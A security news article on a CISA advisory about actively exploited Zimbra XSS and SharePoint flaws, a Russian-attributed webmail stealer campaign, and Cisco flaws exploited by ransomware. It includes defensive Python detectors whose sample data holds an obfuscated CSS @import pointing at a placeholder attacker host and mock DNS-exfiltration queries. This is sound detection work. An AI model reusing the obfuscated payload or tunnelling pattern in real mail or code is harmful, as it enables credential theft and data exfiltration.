CISA Urges Immediate Patching of Critical Zimbra and SharePoint Vulnerabilities Amid Active Exploitation
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent advisory for government agencies to patch two significant vulnerabilities affecting the Synacor Zimbra Collaboration Suite (ZCS) and Microsoft Office SharePoint. These vulnerabilities have been confirmed to be actively exploited in the wild, raising alarms about potential data breaches and unauthorized access.
Overview of the Vulnerabilities
The vulnerabilities identified are:
- CVE-2025-66376 (CVSS score: 7.2): A stored cross-site scripting (XSS) vulnerability in the Classic UI of ZCS. An attacker triggers it with Cascading Style Sheets (CSS) @import directives embedded in an HTML email message, so the injected script runs when the recipient renders the message in the Classic UI. Synacor fixed it in versions 10.0.18 and 10.1.13, released in November 2025.
- CVE-2026-20963 (CVSS score: 8.8): A deserialization of untrusted data vulnerability in Microsoft Office SharePoint that lets an unauthorized attacker execute code over the network. Microsoft fixed it in January 2026.
CISA’s warning emphasizes the critical need for timely patching, especially for Federal Civilian Executive Branch (FCEB) agencies, which are advised to implement fixes for CVE-2025-66376 by April 1, 2026, and for CVE-2026-20963 by March 23, 2026.
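Until the Zimbra patch is deployed, a useful compensating control is to flag, at the mail gateway, HTML bodies that carry CSS @import directives or other active content before a webmail client renders them. The Python scanner below is an added example written for this article; it is not Zimbra's code and not the payload Seqrite Labs analysed. The two MIME messages inside it are constructed, and the `attacker.invalid` URL is a placeholder. It decodes CSS hex escapes and strips CSS comments before matching, so an obfuscated `@\69mport` or `@/**/import` is caught along with the plain form.

```python
"""Flag HTML e-mail bodies that carry CSS @import directives or other
active content before a webmail client renders them.

Added example for this article: not Zimbra code and not the Operation
GhostMail payload. Both sample messages below are constructed.
"""
import re
from email import message_from_string, policy
from html.parser import HTMLParser

# CSS lets any character be written as a backslash escape of 1-6 hex
# digits, optionally followed by one whitespace: "@\69mport" == "@import".
_CSS_HEX_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\n]?")
_CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def _unescape(match: re.Match) -> str:
    code = int(match.group(1), 16)
    return chr(code) if code <= 0x10FFFF else "\ufffd"


def normalize_css(text: str) -> str:
    """Decode hex escapes and drop comments so obfuscated directives
    ("@\\69mport", "@/**/import") compare equal to the plain form."""
    text = _CSS_HEX_ESCAPE.sub(_unescape, text)
    text = _CSS_COMMENT.sub("", text)
    return text.lower()


class _ActiveContentScanner(HTMLParser):
    """Collects findings for <style> blocks and style attributes that
    contain @import, <script>, <link rel=stylesheet>, and on* handlers."""

    def __init__(self) -> None:
        super().__init__()
        self.findings = []
        self._style_buf = None  # list of text chunks while inside <style>

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "style":
            self._style_buf = []
        elif tag == "script":
            self.findings.append("script-element")
        elif tag == "link" and (attrs.get("rel") or "").lower() == "stylesheet":
            self.findings.append(f"external-stylesheet:{attrs.get('href')}")
        style_attr = attrs.get("style")
        if style_attr and "@import" in normalize_css(style_attr):
            self.findings.append("css-import-in-style-attribute")
        for name in attrs:
            if name.startswith("on"):
                self.findings.append(f"event-handler:{name}")

    def handle_data(self, data):
        if self._style_buf is not None:
            self._style_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "style" and self._style_buf is not None:
            if "@import" in normalize_css("".join(self._style_buf)):
                self.findings.append("css-import-in-style-element")
            self._style_buf = None


def scan_message(raw_message: str) -> list:
    """Parse a raw RFC 5322 message and scan every text/html part."""
    msg = message_from_string(raw_message, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        scanner = _ActiveContentScanner()
        scanner.feed(part.get_content())
        scanner.close()
        findings.extend(scanner.findings)
    return findings


# Constructed sample: plain HTML with an inline style, nothing active.
SAMPLE_BENIGN = """\
From: alice@example.invalid
To: bob@example.invalid
Subject: Agenda
Content-Type: text/html; charset=utf-8

<html><body><p style="color:#333">See attached agenda.</p></body></html>
"""

# Constructed sample: an @import hidden behind a CSS hex escape for "i",
# plus a body onload handler. attacker.invalid is a placeholder host.
SAMPLE_SUSPICIOUS = """\
From: news@example.invalid
To: bob@example.invalid
Subject: Update
Content-Type: text/html; charset=utf-8

<html><head><style>
/* obfuscated: hex escape for the letter i */
@\\69mport url("https://attacker.invalid/x.css");
</style></head><body onload="f()">
<p>Please review.</p></body></html>
"""

if __name__ == "__main__":
    print("benign:", scan_message(SAMPLE_BENIGN))
    print("suspicious:", scan_message(SAMPLE_SUSPICIOUS))
```

`@import` is only meaningful at the top of a stylesheet, but the scanner flags it inside style attributes as well, since any occurrence in mail is suspect and the cost of a false positive at quarantine is low. In a real gateway the findings list feeds a policy decision (strip the `<style>` block, quarantine, or tag the subject) rather than a print.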
Context of Exploitation
The addition of CVE-2025-66376 to CISA’s Known Exploited Vulnerabilities (KEV) catalog follows a report from Seqrite Labs. This report detailed a campaign, dubbed Operation GhostMail, allegedly orchestrated by a Russian state-sponsored group targeting the State Hydrographic Service of Ukraine. The operation employs social engineering tactics to deliver an obfuscated JavaScript payload through email.
Seqrite Labs noted that the phishing email carries no malicious attachment and no suspicious link. Instead, the entire attack chain sits in the HTML body of the message and executes inside the victim's authenticated Zimbra webmail session once the message is rendered.
The JavaScript is a stealer: it harvests credentials, session tokens, two-factor authentication (2FA) backup recovery codes, and browser-saved passwords, and exfiltrates the data over both DNS and HTTPS. The email tied to this campaign was sent on January 22, 2026, from a compromised account belonging to the National Academy of Internal Affairs.
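The DNS leg of that exfiltration leaves a shape a resolver log can catch: one client sending many distinct names to one registrable domain, each with a long, high-entropy leftmost label carrying encoded data. The Python below is an added example for this article, not tooling from Seqrite Labs and not a published indicator; the resolver log it parses is constructed, the `exfil-example.invalid` and `static-cdn.invalid` domains are placeholders, and the thresholds are assumptions to tune per environment.

```python
"""Spot DNS-tunnelled exfiltration in resolver query logs.

Added example for this article: the log lines and the .invalid domains
below are constructed, and the thresholds are assumptions to tune per
environment. Nothing here comes from the Seqrite Labs report.
"""
import math
from collections import Counter, defaultdict

# Constructed resolver log: "<timestamp> <client> <qtype> <qname>".
# The four TXT queries mimic chunked, hex-encoded data in the leftmost
# label with a sequence number in the next one.
SAMPLE_DNS_LOG = """\
2026-01-22T09:14:01Z 10.0.5.23 A www.example.com
2026-01-22T09:14:02Z 10.0.5.23 A mail.example.com
2026-01-22T09:14:03Z 10.0.5.23 A cdn.example.com
2026-01-22T09:14:04Z 10.0.5.23 AAAA api.example.com
2026-01-22T09:14:05Z 10.0.5.23 TXT a3f09c1e5b7d24866842d7b5e1c90f3a.0001.t.exfil-example.invalid
2026-01-22T09:14:05Z 10.0.5.23 TXT 0f3a6c9e2b5d81744718d5b2e9c6a3f0.0002.t.exfil-example.invalid
2026-01-22T09:14:06Z 10.0.5.23 TXT 9e2c5a8f1d4b70366307b4d1f8a5c2e9.0003.t.exfil-example.invalid
2026-01-22T09:14:06Z 10.0.5.23 TXT c7e1a5f3b9d0284664820d9b3f5a1e7c.0004.t.exfil-example.invalid
2026-01-22T09:14:07Z 10.0.5.23 A www.example.com
2026-01-22T09:14:08Z 10.0.7.9 A d3k9s2ab1x7pq4m0.static-cdn.invalid
"""


def shannon_entropy(s: str) -> float:
    """Bits per character; 16 hex digits used evenly give exactly 4.0."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registrable_domain(qname: str) -> str:
    """Last two labels. Good enough for a demo; production code should
    consult the Public Suffix List so 'example.co.uk' is not split wrong."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def find_dns_exfil(log: str, min_queries: int = 4,
                   min_label_len: int = 16, min_entropy: float = 3.0) -> list:
    """Group queries by (client, registrable domain) and alert when a
    client sends many distinct names whose longest subdomain label is
    long and high-entropy, the shape of data encoded into DNS names."""
    groups = defaultdict(set)
    for line in log.splitlines():
        if not line.strip():
            continue
        _ts, client, _qtype, qname = line.split()
        groups[(client, registrable_domain(qname))].add(qname.lower())

    alerts = []
    for (client, domain), names in groups.items():
        if len(names) < min_queries:
            continue
        # Longest label left of the registrable domain, per unique name.
        payload_labels = [max(n.split(".")[:-2], key=len, default="") for n in names]
        avg_len = sum(map(len, payload_labels)) / len(payload_labels)
        avg_entropy = sum(map(shannon_entropy, payload_labels)) / len(payload_labels)
        if avg_len >= min_label_len and avg_entropy >= min_entropy:
            alerts.append({
                "client": client,
                "domain": domain,
                "queries": len(names),
                "avg_label_len": avg_len,
                "avg_entropy": avg_entropy,
                "example": sorted(names)[0],
            })
    return sorted(alerts, key=lambda a: (a["client"], a["domain"]))


if __name__ == "__main__":
    for alert in find_dns_exfil(SAMPLE_DNS_LOG):
        print(alert)
```

The `example.com` traffic reaches the query-count threshold but its labels are short and low-entropy, and the single CDN-style hostname has a long label but only one query, so neither trips the rule; only the hex-chunked TXT queries do. Per-client unique-name counts are the key: a stealer that re-uses a handful of fixed names would need a different heuristic, such as TXT response size or query volume per minute.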
Implications for Cybersecurity
The tactics employed in Operation GhostMail reflect a troubling evolution in intrusion methods. Because the stealer runs entirely inside the browser rather than being dropped as a malware binary, the attacker gets full interception of the webmail session without writing a file that endpoint-based detections would inspect. Organizations therefore need controls at the mail and browser layer, not only on the endpoint, to counter phishing of this kind.
The campaign aligns with previous operations by Russian state-sponsored threat actors, such as Operation RoundPress, which similarly exploited XSS vulnerabilities in webmail systems to breach Ukrainian organizations.
Currently, there are no public reports detailing the exploitation of CVE-2026-20963 or the identity of the threat actors behind it. However, the ongoing active exploitation of both vulnerabilities necessitates immediate action from affected organizations.
Broader Threat Landscape
The urgency of CISA’s advisory coincides with revelations from Amazon regarding the Interlock ransomware group. This group has exploited a critical security flaw in Cisco’s firewall management software (CVE-2026-20131, CVSS score: 10.0) since January 26, 2026, well before the vulnerability was publicly disclosed.
Interlock has historically targeted sectors where operational disruption can exert maximum pressure for ransom payments, including education, healthcare, and government entities. The exploitation of CVE-2026-20131 as a zero-day vulnerability illustrates the lengths to which attackers will go to identify and exploit previously unknown flaws.
CISA’s Ongoing Efforts
On March 19, 2026, CISA added CVE-2026-20131 to its KEV catalog, mandating that FCEB agencies update their systems by March 22, 2026. Additionally, CISA issued an emergency directive urging these agencies to mitigate vulnerabilities in Cisco Catalyst SD-WAN systems, which have also come under active exploitation.
A recent report from VulnCheck highlighted another vulnerability in Catalyst SD-WAN (CVE-2026-20133), indicating that it poses a higher risk than previously recognized. This flaw allows attackers to extract sensitive data, including private keys, and could lead to escalated privileges within the network.
The evolving threat landscape necessitates that organizations remain vigilant and proactive in their cybersecurity measures. As vulnerabilities are discovered and exploited, timely patching and robust security protocols become paramount.